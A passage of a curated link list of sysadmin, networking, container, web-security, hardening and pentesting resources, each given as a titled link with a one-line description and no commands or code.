:small_orange_diamond: <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br>
:small_orange_diamond: <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br>
:small_orange_diamond: <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.<br>
:small_orange_diamond: <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br>
:small_orange_diamond: <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br>
:small_orange_diamond: <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br>
:small_orange_diamond: <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br>
</p>
##### :black_small_square: HTTP(s) Services
<p>
:small_orange_diamond: <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br>
:small_orange_diamond: <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br>
:small_orange_diamond: <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br>
:small_orange_diamond: <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br>
:small_orange_diamond: <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br>
:small_orange_diamond: <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br>
</p>
##### :black_small_square: DNS Services
<p>
:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br>
:small_orange_diamond: <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br>
:small_orange_diamond: <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br>
</p>
##### :black_small_square: Other Services
<p>
:small_orange_diamond: <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br>
</p>
##### :black_small_square: Security/hardening
<p>
:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP) based in Seattle.<br>
:small_orange_diamond: <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-hole® is a DNS sinkhole that protects your devices from unwanted content.<br>
:small_orange_diamond: <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br>
:small_orange_diamond: <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br>
:small_orange_diamond: <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br>
:small_orange_diamond: <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, Shadowsocks, and more.<br>
</p>
#### Networks [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Tools
<p>
:small_orange_diamond: <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br>
:small_orange_diamond: <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br>
</p>
##### :black_small_square: Labs
<p>
:small_orange_diamond: <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG); tools, talks, papers and more.<br>
</p>
#### Containers/Orchestration [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: CLI Tools
<p>
:small_orange_diamond: <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br>
:small_orange_diamond: <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br>
:small_orange_diamond: <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - is a script that checks for dozens of common best-practices around deploying Docker.<br>
</p>
##### :black_small_square: Web Tools
<p>
:small_orange_diamond: <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br>
:small_orange_diamond: <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br>
:small_orange_diamond: <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br>
:small_orange_diamond: <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br>
:small_orange_diamond: <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br>
:small_orange_diamond: <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br>
</p>
##### :black_small_square: Manuals/Tutorials/Best Practices
<p>
:small_orange_diamond: <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br>
:small_orange_diamond: <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br>
:small_orange_diamond: <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br>
:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs
</b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br>
:small_orange_diamond: <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br>
:small_orange_diamond: <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br>
:small_orange_diamond: <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br>
:small_orange_diamond: <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br>
:small_orange_diamond: <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br>
:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br>
:small_orange_diamond: <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br>
:small_orange_diamond: <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br>
</p>
#### Manuals/Howtos/Tutorials [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shell/Command line
<p>
:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br>
:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br>
:small_orange_diamond: <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br>
:small_orange_diamond: <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br>
:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br>
:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands and utilities offered to application programs by POSIX-conformant systems.<br>
:small_orange_diamond: <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br>
:small_orange_diamond: <a href="https://google.github.io/styleguide/shell.xml"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br>
</p>
##### :black_small_square: Text Editors
<p>
:small_orange_diamond: <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br>
</p>
##### :black_small_square: Python
<p>
:small_orange_diamond: <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br>
:small_orange_diamond: <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br>
:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br>
</p>
##### :black_small_square: Sed & Awk & Other
<p>
:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>F’Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br>
</p>
##### :black_small_square: \*nix & Network
<p>
:small_orange_diamond: <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br>
:small_orange_diamond: <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br>
:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br>
:small_orange_diamond: <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br>
:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - collection of Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br>
:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br>
:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br>
:small_orange_diamond: <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br>
:small_orange_diamond: <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br>
:small_orange_diamond: <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br>
:small_orange_diamond: <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br>
:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br>
:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - describes how to improve NGINX performance, security and other important things.<br>
:small_orange_diamond: <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br>
:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br>
:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br>
:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br>
:small_orange_diamond: <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br>
</p>
##### :black_small_square: Microsoft
<p>
:small_orange_diamond: <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation adversary tradecraft activity.<br>
</p>
##### :black_small_square: Large-scale systems
<p>
:small_orange_diamond: <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br>
:small_orange_diamond: <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability and more.<br>
:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br>
</p>
##### :black_small_square: System hardening
<p>
:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - are secure configuration settings for over 100 technologies, available as a free PDF download.<br>
:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br>
:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br>
:small_orange_diamond: <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br>
</p>
##### :black_small_square: Security & Privacy
<p>
:small_orange_diamond: <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br>
:small_orange_diamond: <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br>
:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br>
:small_orange_diamond: <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br>
:small_orange_diamond: <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br>
:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br>
:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br>
:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br>
:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br>
</p>
##### :black_small_square: Web Apps
<p>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br>
:small_orange_diamond: <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br>
:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br>
:small_orange_diamond: <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br>
:small_orange_diamond: <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br>
:small_orange_diamond: <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br>
:small_orange_diamond: <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br>
:small_orange_diamond: <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various reverse proxies, cache proxies, etc.<br>
:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br>
:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br>
:small_orange_diamond: <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br>
:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br>
:small_orange_diamond: <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br>
</p>
##### :black_small_square: All-in-one
<p>
:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br>
:small_orange_diamond: <a href="https://github.com/rstacruz/cheatsheets"><b>Dan’s Cheat Sheets’s</b></a> - massive cheat sheets documentation.<br>
:small_orange_diamond: <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br>
:small_orange_diamond: <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br>
:small_orange_diamond: <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br>
:small_orange_diamond: <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br>
:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br>
:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br>
:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br>
:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - sampling tools like dtrace's don't really provide methods to see what programs are blocking on.<br>
:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br>
:small_orange_diamond: <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br>
:small_orange_diamond: <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br>
:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br>
:small_orange_diamond: <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br>
:small_orange_diamond: <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br>
:small_orange_diamond: <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br>
:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br>
:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br>
:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br>
:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br>
:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - an infographics which should help to estimate costs of certain operations in CPU clocks.<br>
:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br>
:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br>
:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br>
:small_orange_diamond: <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br>
:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br>
:small_orange_diamond: <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br>
:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br>
:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br>
:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br>
:small_orange_diamond: <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br>
:small_orange_diamond: <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br>
:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br>
</p>
#### Inspiring Lists [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
:small_orange_diamond: <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br>
:small_orange_diamond: <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br>
:small_orange_diamond: <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - from finding text to search and replace, from sorting to beautifying text and more.<br>
:small_orange_diamond: <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br>
:small_orange_diamond: <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br>
:small_orange_diamond: <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - learn where some of the network sysctl variables fit into the Linux/Kernel network flow.<br>
:small_orange_diamond: <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br>
:small_orange_diamond: <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br>
:small_orange_diamond: <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br>
:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge collection of applications sorted by category, as a reference for those looking for packages.<br>
:small_orange_diamond: <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br>
:small_orange_diamond: <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br>
:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br>
:small_orange_diamond: <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p>
##### :black_small_square: Developers
<p>
:small_orange_diamond: <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br>
:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br>
:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - the only Front-End Performance Checklist that runs faster than the others.<br>
:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br>
:small_orange_diamond: <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br>
:small_orange_diamond: <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br>
:small_orange_diamond: <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br>
</p>
##### :black_small_square: Security/Pentesting
<p>
:small_orange_diamond: <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br>
:small_orange_diamond: <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br>
:small_orange_diamond: <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br>
:small_orange_diamond: <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br>
:small_orange_diamond: <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br>
:small_orange_diamond: <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br>
:small_orange_diamond: <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br>
:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br>
:small_orange_diamond: <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br>
:small_orange_diamond: <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br>
:small_orange_diamond: <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br>
:small_orange_diamond: <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br>
:small_orange_diamond: <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br>
